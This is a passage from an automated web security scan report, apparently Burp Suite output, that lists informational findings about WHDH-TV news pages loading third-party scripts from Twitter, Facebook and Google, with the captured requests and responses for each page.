Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:24:21 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 27098
Cache-Control: max-age=42158
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:06:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107002 (MII-APC/1.6)
Content-Length: 23405
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Late firefighter's helmet returned to family</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1527. http://www1.whdh.com/news/articles/local/12003352172056/body-found-on-dorchester-street/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003352172056/body-found-on-dorchester-street/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003352172056/body-found-on-dorchester-street/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:59 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=9507
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:33:38 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21286
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Body found on Dorchester street</title>
<meta name="publisher" content="Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1528. http://www1.whdh.com/news/articles/local/12003353543556/heating-safety-pet-care-urged-during-cold/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003353543556/heating-safety-pet-care-urged-during-cold/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003353543556/heating-safety-pet-care-urged-during-cold/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:57 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=8324
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:13:53 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23121
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Heating safety, pet care stressed during cold</title>
<meta name="publishe
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1529. http://www1.whdh.com/news/articles/local/12003357106622/bipartisan-mass-lawmakers-offer-own-parole-ideas/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003357106622/bipartisan-mass-lawmakers-offer-own-parole-ideas/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003357106622/bipartisan-mass-lawmakers-offer-own-parole-ideas/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:00 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=15409
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:12:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19859
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Bipartisan Mass. lawmakers offer own Parole ideas</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1530. http://www1.whdh.com/news/articles/local/12003357131364/efforts-under-way-to-remember-leominster-soldier/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003357131364/efforts-under-way-to-remember-leominster-soldier/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003357131364/efforts-under-way-to-remember-leominster-soldier/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:00 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=14717
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:00:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19097
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Efforts under way to remember Leominster soldier</title>
<meta name="publi
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1531. http://www1.whdh.com/news/articles/local/12003357194410/clinical-data-gets-fda-ok-for-depression-drug/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003357194410/clinical-data-gets-fda-ok-for-depression-drug/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003357194410/clinical-data-gets-fda-ok-for-depression-drug/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:50 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=30639
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:25:39 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18969
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Clinical Data gets FDA OK for depression drug</title>
<meta name="publishe
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1532. http://www1.whdh.com/news/articles/local/12003358616998/children-parents-bundled-to-go-to-work-and-school/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003358616998/children-parents-bundled-to-go-to-work-and-school/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003358616998/children-parents-bundled-to-go-to-work-and-school/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=29463
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:06:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21849
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Children, parents bundled to go to work and school</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1533. http://www1.whdh.com/news/articles/local/12003358692844/t-riders-endure-long-waits-in-the-cold-trains-delayed/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003358692844/t-riders-endure-long-waits-in-the-cold-trains-delayed/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003358692844/t-riders-endure-long-waits-in-the-cold-trains-delayed/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:32:38 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1385
Cache-Control: max-age=29347
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:40:56 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Content-Length: 21967
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - 'T' riders endure long waits in the cold, trains delayed</title>
<meta nam
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1534. http://www1.whdh.com/news/articles/local/12003358823664/people-do-whatever-they-can-to-stay-warm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003358823664/people-do-whatever-they-can-to-stay-warm/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003358823664/people-do-whatever-they-can-to-stay-warm/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:31 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 28
Cache-Control: max-age=29280
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:02:41 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 21905
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - People do whatever they can to stay warm</title>
<meta name="publisher" co
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1535. http://www1.whdh.com/news/articles/local/12003358918527/bicyclist-hit-killed-in-boston/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003358918527/bicyclist-hit-killed-in-boston/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003358918527/bicyclist-hit-killed-in-boston/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:39:11 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 998
Cache-Control: max-age=32047
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:32:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 20689
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Bicyclist hit, killed in Boston</title>
<meta name="publisher" content="Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1536. http://www1.whdh.com/news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=33445
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 07:12:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21272
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Quincy school evacuated due to odor and pipe burst</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1537. http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/ HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; __utmc=208585492; __utmb=208585492.1.10.1295906131; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; ACC1TAB=1

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 19:34:36 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 8441
Cache-Control: max-age=42677
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 07:25:03 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 20082

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Commuter rail service updates for Jan. 24</title>
<meta name="publisher" c
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1538. http://www1.whdh.com/news/articles/national/12003335585262/doc-giffords-heard-cheers-leaving-ariz-smiled/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003335585262/doc-giffords-heard-cheers-leaving-ariz-smiled/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003335585262/doc-giffords-heard-cheers-leaving-ariz-smiled/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:32 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43138
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:53:40 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25492
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Doc: Giffords heard cheers leaving Ariz., smiled</title>
<meta name="publi
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1539. http://www1.whdh.com/news/articles/national/12003352445114/brain-fluid-buildup-delays-full-rehab-for-giffords/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003352445114/brain-fluid-buildup-delays-full-rehab-for-giffords/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003352445114/brain-fluid-buildup-delays-full-rehab-for-giffords/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=13107
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 01:33:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20085
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Brain fluid buildup delays full rehab for Giffords</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

